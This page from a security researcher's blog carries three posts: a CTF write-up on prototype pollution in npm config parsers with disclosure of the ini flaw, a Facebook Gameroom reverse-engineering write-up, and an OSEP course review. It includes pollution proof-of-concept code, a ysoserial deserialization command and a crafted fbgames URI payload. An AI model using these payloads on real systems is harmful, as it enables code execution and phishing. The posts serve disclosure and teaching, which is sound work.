spaceraccoon.dev

Supply Chain Pollution: Hunting a 16 Million Download/Week npm Package Vulnerability for a CTF Challenge

23 December 2020 at 15:29

Background

GovTech's Cyber Security Group recently organised the STACK the Flags Cybersecurity Capture-the-Flag (CTF) competition from 4th to 6th December 2020. For the web domain, my team wanted to build challenges that addressed real-world issues we have encountered during penetration testing of government web applications and commercial off-the-shelf products.

From my experience, a significant number of vulnerabilities arise from developers' lack of familiarity with third-party libraries that they use in their code. If these libraries are compromised by malicious actors or applied in an insecure manner, developers can unknowingly introduce devastating weaknesses in their applications. The SolarWinds supply chain attack is a prime example of this.

Node.js is one of the most popular platforms among web developers, and its ecosystem has had its fair share of issues with third-party libraries. The Node package manager, better known as npm, serves more than one hundred billion packages per month and hosts close to one-and-a-half million packages. Part of what makes package ecosystems so large is their tree-like dependency structure. Every time you install a package in your project, you also install that package's dependencies, and their dependencies, and so on - sometimes ending up with dozens of packages!

npm's recent statistics.

If a single dependency in this chain is compromised or vulnerable, it can lead to cascading effects on the entire ecosystem. In 2018, a widely-used npm package, event-stream, was taken over by a malicious author who added bitcoin-stealing code targeting the Copay bitcoin wallet. Even though the attacker had a single target in mind, the popular event-stream package was downloaded nearly 8 million times in 2.5 months before the malicious code was discovered. In 2019, I presented a tool called npm-scan at Black Hat Asia that sought to identify malicious packages, but it was clear that npm needed to resolve this systematically. Thankfully, the npm ecosystem has improved significantly since then, including the release of the npm audit feature and more active monitoring.

Hunting NPM Package Vulnerabilities

With this context in mind, I set out to design a challenge that used a vulnerable npm package. Additionally, I wanted to exploit a prototype pollution vulnerability. To put it simply, prototype pollution involves overwriting the properties of JavaScript objects in an application by polluting the objects' prototypes. For example, if I overwrote the toString property of an object and printed that object with console.log, it would output my overwritten value instead of the actual string representation of that object. This can lead to critical issues depending on the application - imagine what would happen if I overwrote the isAdmin property of a user object to always be true! Nevertheless, as the impact of prototype pollution remains dependent on the application context, few know how to properly exploit it.
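The isAdmin scenario can be sketched in a few lines. This is an illustration only: the user and attackerControlled objects are hypothetical, and the snippet pollutes Object.prototype directly rather than through a vulnerable package, then cleans up after itself.

```javascript
// Illustrative only: pollute Object.prototype directly, then clean up.
const user = { name: 'alice' };   // has no isAdmin property of its own
const before = user.isAdmin;      // nothing to inherit yet

// Any code path that can write through obj.__proto__ reaches Object.prototype.
const attackerControlled = {};
attackerControlled.__proto__.isAdmin = true;

const after = user.isAdmin;       // now inherited from the shared prototype
const freshObject = {}.isAdmin;   // newly created objects inherit it too

console.log(before, after, freshObject);

// Remove the polluted property so the rest of the process is unaffected.
delete Object.prototype.isAdmin;
```

The key point is that user was never touched; the write landed on the prototype that almost every object shares.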

Next, I applied two tactics to find npm packages that were vulnerable to prototype pollution: pattern matching and functionality grouping.

Pattern Matching

When vulnerable code is written, it often falls into recognisable patterns that can be captured by static scanners. This forms the basis of many tools such as GitHub's CodeQL, which scans open source codebases for unsafe code patterns. While scanners are used defensively to discover vulnerabilities ahead of time, attackers can also perform their own pattern matching to discover unreported vulnerabilities in open source code.

My tool of choice was grep.app, a speedy regex search engine that trawls over half a million public repositories on GitHub. Since most npm packages host their code on GitHub, I felt confident that it would uncover at least a few vulnerable packages. The next step was to identify a useful regex pattern. I looked up previously-disclosed prototype pollution vulnerabilities in npm packages and found a January 2020 Snyk advisory for the dot-prop package. Next, I checked the GitHub commit that patched the vulnerability.

dot-prop's code diff.

dot-prop patched the prototype pollution vulnerability by blacklisting the following keys:

const disallowedKeys = [
	'__proto__',
	'prototype',
	'constructor'
];

Here, there was no obvious code pattern that was inherently vulnerable; it was the lack of a blacklist that made it vulnerable. I decided to zoom out a little and focus on what dot-prop did that required a blacklist in the first place. According to the package description, dot-prop is a package to get, set, or delete a property from a nested object using a dot path.

For example, I could set a property like so:

// Setter
const object = {foo: {bar: 'a'}};
dotProp.set(object, 'foo.bar', 'b');
console.log(object); // {foo: {bar: 'b'}}

However, the following proof-of-concept would trigger a prototype pollution using dot-prop's set function:

const object = {};
console.log("Before " + object.b); // Undefined
dotProp.set(object, '__proto__.b', true);
console.log("After " + {}.b); // true

This worked because the function of dot-prop was to parse a dotted path string as keys in an object and set the values of those keys. Based on what we know about prototype pollution, this is inherently dangerous unless certain keys are blacklisted.
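To make the mechanism concrete, here is a minimal sketch of a dotted-path setter with and without a key blacklist. It is not dot-prop's actual implementation; setNaive, setGuarded, and the choice to silently ignore disallowed paths are assumptions made for illustration.

```javascript
const DISALLOWED_KEYS = new Set(['__proto__', 'prototype', 'constructor']);

// Naive setter: walks the dotted path and creates objects as needed.
function setNaive(target, path, value) {
  const keys = path.split('.');
  let node = target;
  for (const key of keys.slice(0, -1)) {
    if (typeof node[key] !== 'object' || node[key] === null) node[key] = {};
    node = node[key]; // for '__proto__' this steps onto Object.prototype
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// Guarded setter: ignores any path that contains a disallowed key.
function setGuarded(target, path, value) {
  if (path.split('.').some((key) => DISALLOWED_KEYS.has(key))) return target;
  return setNaive(target, path, value);
}

setNaive({}, '__proto__.naive', true);
const naivePolluted = {}.naive === true;
delete Object.prototype.naive; // clean up after the demonstration

setGuarded({}, '__proto__.guarded', true);
const guardedPolluted = {}.guarded === true;

const legit = setGuarded({ foo: { bar: 'a' } }, 'foo.bar', 'b');
console.log({ naivePolluted, guardedPolluted, legit });
```

The guard rejects the whole path rather than trying to sanitise it, which keeps the check simple at the cost of refusing legitimate keys that happen to be named constructor or prototype.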

After considering this, I decided to search for patterns that matched other dotted path parsers. dot-prop used path.split('.') to split up dotted paths, although I later discovered that key.split('.') was commonly used by other packages as well. With this approach, I discovered several vulnerable packages, but this required me to manually inspect each package's code to verify if a blacklist was used. Additionally, not all dotted path parsers used key or path to denote the dotted path string, so I probably missed out on many more.
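As a rough sketch of this kind of search, the pattern below matches any identifier followed by .split('.') or .split("."), which avoids hard-coding path or key as the variable name. The pattern and the sample lines are my own assumptions, not the exact query used on grep.app, and every hit would still need manual review for a blacklist.

```javascript
// Hypothetical pattern: <identifier>.split('.') or <identifier>.split(".")
const dottedSplit = /\b([A-Za-z_$][\w$]*)\.split\(\s*['"]\.['"]\s*\)/;

// Made-up lines standing in for search results.
const samples = [
  "const parts = path.split('.');",
  'key.split(".").forEach(walk);',
  "const segments = propertyName.split('.');",
  "line.split(',')",
];

const hits = samples
  .map((line) => ({ line, match: dottedSplit.exec(line) }))
  .filter(({ match }) => match !== null)
  .map(({ line, match }) => ({ variable: match[1], line }));

console.log(hits);
```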

grep.app search with JavaScript filter.

Functionality Grouping

I realised that a better approach would be to group npm packages based on their functionality - in the previous case, dotted path parsers. This is because such functionality is unsafe by default unless appropriate blacklists or safeguards are put in place. After looking through the dotted path parsers, I stumbled on a far more prolific group of packages - configuration file parsers.

Configuration files come in various formats such as YAML, JSON, and more. Out of these, TOML and INI are very similar and match this format:

[foo]
bar = "baz"

A typical INI parser would parse this file into the following object:

iniParser.parse(fs.readFileSync('./config.ini', 'utf-8')) // { foo: { bar: 'baz' } }

However, unless the parser sets up a blacklist, the following config file would lead to prototype pollution:

[__proto__]
polluted = "polluted"

Parsing this payload with a vulnerable parser pollutes the prototype shared by every object:

const parsed = iniParser.parse(fs.readFileSync('./payload.ini', 'utf-8')) // { }
console.log(parsed.__proto__) // { polluted: 'polluted' }
console.log({}.polluted) // polluted
console.log(polluted) // polluted
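The reason a section header is enough becomes clearer with a toy parser. The sketch below is not the code of ini or any other real package; parseIni and its guard option are hypothetical, and it only understands [section] headers and key = value lines.

```javascript
// Toy parser for "[section]" headers and "key = value" lines only.
function parseIni(text, { guard = false } = {}) {
  const out = {};
  let section = out;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (line === '' || line.startsWith(';')) continue;
    const header = /^\[(.+)\]$/.exec(line);
    if (header) {
      const name = header[1];
      if (guard && name === '__proto__') {
        section = {}; // throwaway object: keys in this section are discarded
        continue;
      }
      // out['__proto__'] already "exists" (it is Object.prototype), so it is reused.
      section = out[name] = out[name] || {};
      continue;
    }
    const pair = /^([^=]+)=(.*)$/.exec(line);
    if (!pair) continue;
    const key = pair[1].trim();
    if (guard && key === '__proto__') continue;
    section[key] = pair[2].trim().replace(/^"(.*)"$/, '$1');
  }
  return out;
}

const payload = '[__proto__]\npolluted = "polluted"';

parseIni(payload);
const unguarded = {}.polluted;
delete Object.prototype.polluted; // clean up after the demonstration

parseIni(payload, { guard: true });
const guarded = {}.polluted;

const config = parseIni('[foo]\nbar = "baz"');
console.log({ unguarded, guarded, config });
```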

Indeed, prototype pollution vulnerabilities have been reported in such parsers previously, but only on an ad-hoc basis. I built my proof-of-concept code to quickly test packages at scale, then used npm's search function to discover other parsers. The search function supports searching by tags such as keywords:toml or keywords:toml-parser, allowing me to quickly discover multiple vulnerable packages.
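A harness for testing many parsers could look something like the sketch below. It is not the proof-of-concept from the post: pollutesPrototype, makeParser, and the two candidate names are hypothetical stand-ins for real packages, which would normally be loaded with require and called through whatever parse function each one exposes.

```javascript
// Returns true if calling parse(payload) leaves `canary` on Object.prototype.
function pollutesPrototype(parse, payload, canary = 'polluted') {
  delete Object.prototype[canary];
  try {
    parse(payload);
  } catch (err) {
    // A parser that throws on the payload is treated as not polluting.
  }
  const polluted = Object.prototype.hasOwnProperty.call(Object.prototype, canary);
  delete Object.prototype[canary]; // always restore a clean prototype
  return polluted;
}

// Builds a tiny section/key parser whose containers come from createObject.
function makeParser(createObject) {
  return (text) => {
    const out = createObject();
    let section = out;
    for (const line of text.split('\n')) {
      const header = /^\[(.+)\]$/.exec(line.trim());
      if (header) {
        section = out[header[1]] = out[header[1]] || createObject();
        continue;
      }
      const [key, value] = line.split('=').map((part) => part.trim());
      if (key && value !== undefined) section[key] = value;
    }
    return out;
  };
}

// Hypothetical candidates standing in for packages found via npm search.
const candidates = {
  'plain-object-parser': makeParser(() => ({})),
  'null-prototype-parser': makeParser(() => Object.create(null)),
};

const payload = '[__proto__]\npolluted = "polluted"';
const report = Object.fromEntries(
  Object.entries(candidates).map(([name, parse]) => [name, pollutesPrototype(parse, payload)])
);
console.log(report);
```

The second candidate shows an alternative to a blacklist: containers created with Object.create(null) have no __proto__ accessor, so the section name becomes an ordinary own property.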

One of these was ini, a simple INI parser with a staggering sixteen million downloads per week:

ini downloads statistics.

This is because almost 2000 dependent packages use ini, including the npm CLI itself! Since npm comes packaged with each default Node.js installation, this means that every user of Node.js was downloading the vulnerable ini package as well. Other notable dependents include the Angular CLI and sodium-native, a wrapper around the libsodium cryptography library. While these packages included ini as a dependency, their risk depended on how ini was used; if they did not call the vulnerable function, the vulnerability would not be triggered.

Packages that depend on ini.

Although I did not use ini for the challenge, I made sure to responsibly disclose the list of vulnerable packages to npm.

Responsible Disclosure

npm supports a robust responsible disclosure process, including a currently-on-hold vulnerability disclosure program. The open source security company Snyk also provides a simple vulnerability disclosure form, which I used to coordinate the disclosures. Fortunately, the disclosure process for ini went smoothly, with the developer patching the vulnerability in two days.

  • December 6, 2020: Initial disclosure to Snyk
  • December 7, 2020: First response from Snyk
  • December 8, 2020: Disclosure to Developer
  • December 10, 2020: Patch issued
  • December 10, 2020: Disclosure published
  • December 11, 2020: CVE-2020-7788 assigned

Other packages are undergoing responsible disclosure or have been disclosed, such as multi-ini.

The vulnerability-hunting process highlighted both the strengths and weaknesses of open source packages. Although open source packages written by third parties can be analysed for vulnerabilities or compromised by malicious actors, developers can also quickly find, report, and patch the vulnerabilities. It remains the responsibility of the organisations and developers to vet packages before using them. While not everyone can afford the resources needed to inspect the code directly, there are free tools such as Snyk Advisor that use metrics such as update frequency and contribution history to estimate a package's health. Developers should also vet new versions of packages, especially if they were written by a different author or published at an unusual time.

In the long run, there are no easy answers to open source package security. Nevertheless, organisations can apply sensible measures to effectively secure their projects.

P.S. One of our participants, Yeo Quan Yang, posted an excellent write-up on the challenge that illustrated the intended solution to chain a prototype pollution in a package with a remote code execution gadget in a templating engine. Check it out here!

Applying Offensive Reverse Engineering to Facebook Gameroom

2 February 2021 at 17:03

Late last year, I was invited to Facebook's Bountycon event, which is an invitation-only application security conference with a live-hacking segment. Although participants could submit vulnerabilities for any Facebook asset, Facebook invited us to focus on Facebook Gaming. Having previously tested Facebook's assets, I knew it was going to be a tough challenge. Their security controls have only gotten tougher over the years – even simple vulnerabilities such as cross-site scripting are hard to come by, which is why they pay out so much for those. As such, top white hat hackers tend to approach Facebook from a third-party software angle, such as Orange Tsai's well-known MobileIron MDM exploits.

Given my limited time (I also started late due to an administrative issue), I decided to stay away from full-scale vulnerability research and focus on simple audits of Facebook Gaming's access controls. However, both the mobile and web applications were well-secured, as one would expect. After a bit of digging, I came across Facebook Gameroom, a Windows-native client for playing Facebook games. I embarked on an illuminating journey of applying offensive reverse engineering to a native desktop application.

Facebook Gameroom, Who Dis?

If you haven't heard about Facebook Gameroom, you're probably not alone. Released in November 2016, Gameroom was touted as a Steam competitor that supports Unity, Flash, and more recently HTML5 games. However, in recent years Facebook has turned its attention to its mobile and web platforms, especially with the rise of streaming. In fact, Gameroom is scheduled to be decommissioned in June this year. Fortunately for me, it was still alive and kicking at the time of the event.

Facebook Gameroom

The first thing I noticed was that Gameroom did not require any elevated permissions to install. It appeared to be a staged installer, where a minimal installer pulls additional files from the web instead of a monolithic installer. Indeed, I quickly found the installation directory at C:\Users\<USERNAME>\AppData\Local\Facebook\Games, since most user-level applications are placed in the C:\Users\<USERNAME>\AppData folder. The folder contained lots of .dll files as well as several executables. A few things stood out to me:

  1. Gameroom came with its own bundled 7zip executable (7z.exe and 7z.dll), which was possibly outdated and vulnerable.
  2. Gameroom stored user session data in a Cookies SQLite database, which presented an attractive target for attackers.
  3. Gameroom included the CefSharp library (CefSharp.dll), which after further research turned out to be an embedded Chromium-based browser for C#.

The third point suggested to me that Gameroom was written in the .NET framework. The .NET framework allows programmes to be compiled into Common Intermediate Language (CIL) code instead of machine code, which can run in a Common Language Runtime application virtual machine. There are several benefits to this, including greater interoperability and portability of .NET applications. However, it is also a lot easier to decompile these applications back into near-source code since they are compiled as CIL rather than pure machine code.

For .NET assemblies, dnSpy is the de facto standard. Reverse engineers can easily debug and analyze .NET applications with dnSpy, including patching them live. I popped FacebookGameroom.exe into dnSpy and got to work.

A Wild Goose Chase: Searching for Vulnerable Functions

I began by searching for vulnerable or dangerous functions such as unsafe deserializations. If you've done the Offensive Security Advanced Web Attacks and Exploitation course, you would be intimately familiar with deserialization attacks. I won't go into detail about them here, but just know that it involves converting data types into easily-transportable formats and back, which can lead to critical vulnerabilities if handled badly. For example, Microsoft warns against using BinaryFormatter in its code quality analyzer with a pretty stark message: "BinaryFormatter is insecure and can't be made secure."

Unfortunately, BinaryFormatter popped up in my search for the "Deserialize" string.

System.Runtime.Serialization.Formatters.Binary.BinaryFormatter

However, I needed to find the vulnerable code path. I right-clicked the search result, selected "Analyze", then worked up the "Used By" chain to locate where Gameroom used BinaryFormatter.Deserialize.

Used By Chain

Eventually, this led me to the System.Configuration.ApplicationSettingsBase.GetPreviousVersion(string) and System.Configuration.ApplicationSettingsBase.GetPropertyValue(string) functions. Gameroom used the deserialization function to retrieve its application settings at startup – but from where? Looking back at the installation folder, I found fbgames.settings, which turned out to be a serialized blob. As such, if I injected a malicious deserialization payload into this file, I could obtain code execution. Before that, however, I needed to find a deserialization gadget. With a bit more searching based on a list of known deserialization gadgets, I discovered that Gameroom used the WindowsIdentity class.

With that, I worked out a code execution proof-of-concept:

  1. Using the ysoserial deserialization attack tool, I generated my code execution payload with ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o raw -c "calc" -t > fbgames.settings.
  2. Next, I copied fbgames.settings to C:\Users\<YOUR USERNAME>\AppData\Local\Facebook and replaced the original file. No admin privileges were required since it was located in a user directory.
  3. Finally, I opened Facebook Gameroom and calculator popped!

Although it was exciting to get code execution, upon further discussion with the Facebook team we agreed that this did not fit their threat model. Since Gameroom executes as a user-level application, there's no opportunity to escalate privileges. Additionally, since overwriting the file required some level of access (e.g. via a malicious Facebook game that would require approval to be listed publicly), there was no viable remote attack vector.

I learned an important lesson in the different threat landscape posed by native applications – search for a viable remote attack vector first before diving into the code-level vulnerabilities.

Scheming My Way to Success

Have you ever clicked on a link from an email and magically started Zoom? What exactly happened behind the scenes? You just used a custom URI scheme, which allows you to open applications like any other link on the web. For example, Zoom registers the zoommtg: URI scheme and parses links like zoommtg:zoom.us/join?confno=123456789&pwd=xxxx&zc=0&browser=chrome&uname=Betty.
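To show what an application receives when it is launched this way, the sketch below parses the example Zoom link with the standard URL class. It only illustrates how the scheme, path, and query parameters can be pulled apart; how Zoom itself parses the link is not something the post describes.

```javascript
// Parse the example link from the text with the standard URL class.
const link = new URL(
  'zoommtg:zoom.us/join?confno=123456789&pwd=xxxx&zc=0&browser=chrome&uname=Betty'
);

const scheme = link.protocol;                         // scheme plus trailing colon
const params = Object.fromEntries(link.searchParams); // query parameters as an object

console.log(scheme);
console.log(link.pathname);
console.log(params);
```

Everything after the scheme is attacker-controllable when the link comes from a web page, which is why the handler's parsing logic is worth auditing.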

Similarly, I noticed that Gameroom used a custom URI scheme to automatically open Gameroom after clicking a link from the web browser. After searching through the code, I realized that Gameroom checked for the fbgames: URI scheme in FacebookGames\Program.cs:

private static void OnInstanceAlreadyRunning()
{
    Uri uri = ArgumentHelper.GetLaunchScheme() ?? new Uri("fbgames://");
    if (SchemeHelper.GetSchemeType(uri) == SchemeHelper.SchemeType.WindowsStartup)
    {
        return;
    }
    NativeHelpers.BroadcastArcadeScheme(uri);
}

If Gameroom had been opened with the fbgames:// URI, it would proceed to parse it in the SchemeHelper class:

public static SchemeHelper.SchemeType GetSchemeType(Uri uri)
{
    if (uri == (Uri) null)
        return SchemeHelper.SchemeType.None;
    string host = uri.Host;
    if (host == "gameid")
        return SchemeHelper.SchemeType.Game;
    if (host == "launch_local")
        return SchemeHelper.SchemeType.LaunchLocal;
    return host == "windows_startup" ? SchemeHelper.SchemeType.WindowsStartup : SchemeHelper.SchemeType.None;
}

public static string GetGameSchemeId(Uri uri)
{
    if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.Game)
        return (string) null;
    string str = uri.AbsolutePath.Substring(1);
    int num = str.IndexOf('/');
    int length = num == -1 ? str.Length : num;
    return str.Substring(0, length);
}

If the URI had the gameid host, it would parse it with SchemeHelper.SchemeType.Game. If it used the launch_local host, it would parse it with SchemeHelper.SchemeType.LaunchLocal. I started with the promising launch_local path, tracing it to FacebookGames.SchemeHelper.GenLocalLaunchFile(Uri):

public static async Task<string> GenLocalLaunchFile(Uri uri)
{
    string result;
    if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.LaunchLocal || uri.LocalPath.Length <= 1)
    {
        result = null;
    }
    else if (!(await new XGameroomCanUserUseLocalLaunchController().GenResponse()).CanUse)
    {
        result = null;
    }
    else
    {
        string text = uri.LocalPath.Substring(1);
        result = ((MessageBox.Show(string.Format("Are you sure you want to run file\n\"{0}\"?", text), "Confirm File Launch", MessageBoxButtons.YesNo) == DialogResult.Yes) ? text : null);
    }
    return result;
}

Unfortunately, it appeared that even though I could launch any arbitrary file in the system through a URI like fbgames://launch_local/C:/evilapp.exe (as documented by Facebook), this would be blocked by a confirmation dialog. I tried to bypass this dialog with format strings and non-standard inputs, but couldn't find a way past it.

I returned to the gameid path, which opened a Facebook URL based on the game ID in the URI. For example, if you wanted to launch Words With Friends in Gameroom, you would visit fbgames://gameid/168378113211268 in a browser and Gameroom would open https://apps.facebook.com/168378113211268 in the native application window.

However, I realized that GetGameSchemeId, which extracted the ID from the URI that would be added to the apps.facebook.com URL, did not actually validate that the slug was a valid ID. As such, an attacker could redirect the native application window to any other page on Facebook.

public static string GetGameSchemeId(Uri uri)
{
    if (SchemeHelper.GetSchemeType(uri) != SchemeHelper.SchemeType.Game)
        return (string) null;
    string str = uri.AbsolutePath.Substring(1);
    int num = str.IndexOf('/');
    int length = num == -1 ? str.Length : num;
    return str.Substring(0, length);
}

For example, fbgames://gameid/evilPage would redirect the Gameroom window to https://apps.facebook.com/evilPage.
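The missing validation is easier to see in a small JavaScript re-creation of the two C# helpers. This is a sketch under assumptions: the standard URL class stands in for .NET's Uri (their parsing rules differ in places), and getValidatedGameId is a hypothetical hardening, not Facebook's actual patch.

```javascript
// Mirrors GetSchemeType: the URI host selects the action.
function getSchemeType(uri) {
  switch (uri.hostname) {
    case 'gameid': return 'Game';
    case 'launch_local': return 'LaunchLocal';
    case 'windows_startup': return 'WindowsStartup';
    default: return 'None';
  }
}

// Mirrors GetGameSchemeId: returns the first path segment, whatever it contains.
function getGameSchemeId(uri) {
  if (getSchemeType(uri) !== 'Game') return null;
  const path = uri.pathname.substring(1);
  const slash = path.indexOf('/');
  return path.substring(0, slash === -1 ? path.length : slash);
}

// Hypothetical hardening: only accept purely numeric IDs.
function getValidatedGameId(uri) {
  const id = getGameSchemeId(uri);
  return id !== null && /^\d+$/.test(id) ? id : null;
}

const evil = new URL('fbgames://gameid/evilPage/app/123456');
const game = new URL('fbgames://gameid/168378113211268');

console.log(getGameSchemeId(evil), getValidatedGameId(evil));
console.log(getGameSchemeId(game), getValidatedGameId(game));
```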

But how could I redirect to attacker-controlled code in Gameroom? There were a few options, including abusing an open redirect on apps.facebook.com. Unfortunately, I did not have one on hand at that time. Another way was to redirect to a Facebook Page or ad that allowed embedded iframes with custom code.

At this point, I hit a roadblock. Revisiting the code of GetGameSchemeId, it took only the first slug in the URI path, so fbgames://gameid/evilPage/app/123456 would direct the native application window to https://apps.facebook.com/evilPage and discard /app/123456.

Fortunately, there were additional code gadgets I could use. The version of Chrome used in Gameroom was really outdated: 63.0.3239.132, while the current version at the time was 86.0.4240.75. As such, it did not support the new version of Facebook Pages. The classic Facebook Pages version accepted an sk parameter such that https://apps.facebook.com/evilPage?sk=app_123456 led to the custom tab with the attacker-controlled code at https://apps.facebook.com/evilPage/app/123456!

But how could I inject the additional query parameter in my custom scheme? Remember that Gameroom discards anything after the first URL slug, including query parameters. Or does it? Looking back at FacebookGames/SchemeHelper.cs, I found GetCanvasParamsFromQuery:

public static IDictionary<string, string> GetCanvasParamsFromQuery(Uri uri)
{
    if (uri == (Uri) null)
        return (IDictionary<string, string>) null;
    string stringToUnescape;
    if (!UriHelper.GetUrlParamsFromQuery(uri.ToString()).TryGetValue("canvas_params", out stringToUnescape))
        return (IDictionary<string, string>) null;
    string str = Uri.UnescapeDataString(stringToUnescape);
    try
    {
        return JsonConvert.DeserializeObject<IDictionary<string, string>>(str);
    }
    catch
    {
        return (IDictionary<string, string>) null;
    }
}

Before passing on the custom URI, Gameroom would use GetCanvasParamsFromQuery to look for the canvas_params query parameter, deserialize it as a JSON dictionary, and add its entries to the new URL as query parameters.

This led me to my final payload scheme. fbgames://gameid/evilPage?canvas_params={"sk":"app_123456"} would be parsed by Gameroom into https://apps.facebook.com/evilPage?sk=app_123456, which loaded the custom tab at https://apps.facebook.com/evilPage/app/123456 in the native application browser window and executed my custom JavaScript code.
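The whole transformation can be approximated in JavaScript as below. It is a sketch under assumptions rather than Gameroom's code: toCanvasUrl is a hypothetical helper, the standard URL class stands in for .NET's Uri and UriHelper, and the payload is percent-encoded here for safety even though the post shows it unencoded.

```javascript
// Rebuilds the apps.facebook.com URL roughly the way the post describes.
function toCanvasUrl(schemeUri) {
  const uri = new URL(schemeUri);
  const slug = uri.pathname.substring(1).split('/')[0]; // first path segment only
  const target = new URL(`https://apps.facebook.com/${slug}`);

  const raw = uri.searchParams.get('canvas_params');
  if (raw !== null) {
    try {
      // Each JSON entry becomes a query parameter on the target URL.
      for (const [key, value] of Object.entries(JSON.parse(raw))) {
        target.searchParams.set(key, String(value));
      }
    } catch (err) {
      // Malformed JSON: ignore canvas_params, similar to the C# code returning null.
    }
  }
  return target.toString();
}

const payload =
  'fbgames://gameid/evilPage?canvas_params=' +
  encodeURIComponent(JSON.stringify({ sk: 'app_123456' }));

const withParams = toCanvasUrl(payload);
const withoutParams = toCanvasUrl('fbgames://gameid/evilPage/app/123456');
console.log(withParams);
console.log(withoutParams);
```

The second call shows the roadblock from earlier: extra path segments are dropped, so canvas_params is the only channel for carrying the sk value through.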

As mentioned earlier, the threat landscape for a native application is very different from a web application. By redirecting the embedded Chrome native window to attacker-controlled JavaScript, an attacker could proceed to perform known exploits on the 3-year-old embedded Chromium browser. Although a full exploit had not been publicly released, I was able to leverage the CVE-2018-6056 proof-of-concept code to crash the Chrome engine via a type confusion vulnerability.

Alternatively, an attacker could create pop-up boxes that were essentially legitimate native MessageBoxes to perform phishing attacks, or attempt to read the cached credentials file. Fortunately, unlike Electron applications that integrate Node.js APIs, CefSharp limits API access. However, it still remains vulnerable to Chromium and third-party library vulnerabilities.

Summing Up

Facebook rated the finding as High and subsequently patched the vulnerability, pushing me into the top-10 leaderboard for Bountycon. Although Gameroom will be shut down soon, it definitely left me with some fond memories (and practice) in basic offensive reverse engineering. For newcomers to application reverse engineering, Electron, CefSharp, and other browser-based frameworks are a good starting place to test for web-adjacent weaknesses like cross-site scripting and open redirects, while exploiting desktop-only code execution vectors.

#reverseengineering #infosec

Offensive Security Experienced Penetration Tester (OSEP) Review and Exam

11 March 2021 at 09:40

Good Things Come in Threes

In August last year, Offensive Security announced that it was retiring the long-standing Offensive Security Certified Expert (OSCE) certification and replacing it with three courses, each with their own certification. If you get all three, you are also awarded the new Offensive Security Certified Expert – Three (OSCE3) certification.

OSCE3 by Offensive Security

While this is undoubtedly a great business decision by Offensive Security – the market loves bundles – how useful are these courses for security professionals? The first of the three courses, Advanced Web Attacks and Exploitation (WEB-300)/Offensive Security Web Expert (OSWE), was already released at that time and is a known quantity. In October 2020, Offensive Security released the Evasion Techniques and Breaching Defenses (PEN-300) course that comes with the Offensive Security Experienced Penetration Tester (OSEP) certification and more recently released Windows User Mode Exploit Development (EXP-301)/Offensive Security Exploit Developer (OSED). The three courses target specific domains and therefore are relevant to different roles in offensive security.

As I had already achieved the OSWE in 2019, I took the 60-day OSEP package from January to February 2021. At the time of writing, this costs $1299. PEN-300/OSEP teaches Red Team skills – if your job involves network penetration (such as through phishing emails) and subsequently pivoting through Active Directory environments with the occasional Linux server, this is the course for you. If you are mostly working on application penetration testing (think web and mobile apps), OSWE is a better fit. And if you are doing vulnerability research in binaries, OSED will build that foundation.

Overall, I felt that the OSEP was worth the price of admission given the sheer amount of content it throws at you, as well as the excellent labs that will solidify your learning-by-doing. Here's my review along with some tips and tricks to maximize your OSEP experience.

What You Should Know

Before jumping in, Offensive Security recommends the following:

  • Working familiarity with Kali Linux and Linux command line
  • Solid ability in enumerating targets to identify vulnerabilities
  • Basic scripting abilities in Bash, Python, and PowerShell
  • Identifying and exploiting vulnerabilities like SQL injection, file inclusion, and local privilege escalation
  • Foundational understanding of Active Directory and knowledge of basic AD attacks
  • Familiarity with C# programming is a plus

Given that PEN-300 is an advanced course, I definitely recommend getting the OSCP first if you don't have the fundamental skills OSEP requires. Additionally, even though the course says familiarity with C# programming is a plus, I think it's almost a necessity given how much C# features in the course.

What You Will Learn

When it comes to Offensive Security courses, I've come to expect a main dish of core knowledge along with a grab-bag of funky side dishes. While PEN-300 dives deep into core penetration testing skills such as antivirus evasion and Active Directory enumeration, it also includes a bunch of extras such as kiosk hacking (think airport internet terminals or digital mall directories), DNS exfiltration, and more. You never know when you might need this knowledge, but I felt that this sometimes comes at the cost of depth. In particular, I felt that the Linux sections were noticeably sparser than the Windows ones; looking at bash histories or Vim configurations isn't exactly groundbreaking.

On the other hand, OSEP is extremely good when it goes deep. I started the course with only a passing knowledge of Active Directory and Windows payloads, but came out confident that I could craft a Word macro or C# executable payload that could evade most antivirus engines and subsequently pivot through the network. In particular, OSEP teaches you about the Windows system APIs that many tools use behind the scenes. So rather than using Mimikatz to dump a credential database, you'll be taught how Mimikatz does this and code it yourself.

As such, you'll be spending a lot of time in Visual Studio coding up your payloads from scratch. I found this experience invaluable in pushing my knowledge beyond OSCP-level practitioner skills into a deep understanding of the Windows environment. The exploits and techniques remain relevant to modern contexts; you'll be working on Windows 10 and Windows Server 2019 boxes most of the time, as well as the latest versions of Linux. The boxes also regularly update their antivirus signatures.

I also really liked how each chapter builds on the previous one. Offensive Security continuously throws additional roadblocks at your initial payload, forcing you to rebuild over and over again. Got an in-memory Meterpreter shell working? Try evading this antivirus! Managed to bypass that? How about beating AppLocker? Got your shell and trying to run some enumeration scripts? Sorry buddy, you have to deal with AMSI. At the end of it all, you'll walk away with a battle-hardened payload and the skills to build it.

What You Should Also Learn By Yourself

Although PEN-300 is fairly modern, it still misses out on some of the latest developments. Additionally, it only mentions tools like BloodHound in passing but doesn't teach you how to use them, which seems like a big omission. As such, I think you should bolster your PEN-300 knowledge with these:

  • BloodHound: Pretty much essential. Learn how to collect BloodHound data with SharpHound, analyze it, and discover lateral movement vectors. PenTest Partners has a great walkthrough and includes the screenshot below.
  • CrackMapExec: Get familiar with this tool and integrate it into your workflow; it'll speed up your lateral movement.
  • Better enumeration scripts: Although PEN-300 recommends a few, I found that I got better coverage by running a few different ones; I like JAWS for Windows and linuxprivchecker for Linux.
  • Other Active Directory lateral movements: HackTricks has a good list.

PenTest Partners BloodHound

Additionally, familiarize yourself with the quirks of your tooling. For example, some versions of Mimikatz work on Windows 10 but not on other Windows versions; keep multiple versions on hand in case you are dealing with a different environment.

How I Prepared for the Exam

Given that the OSEP was a new course, I erred on the side of over-preparation:

  • Completed every single Extra Mile challenge
  • Completed all 6 course labs (do them in order from 1 to 6 as they increase in difficulty)
  • Completed several HackTheBox Windows boxes (see below)
  • Worked on the HackTheBox Cybernetics Pro Lab

I found that HTB boxes were not as useful as I expected, given that they were limited to one machine as compared to PEN-300's focus on networks. Here are the boxes I attempted in order of usefulness (most useful first):

  • Forest
  • Active
  • Monteverde
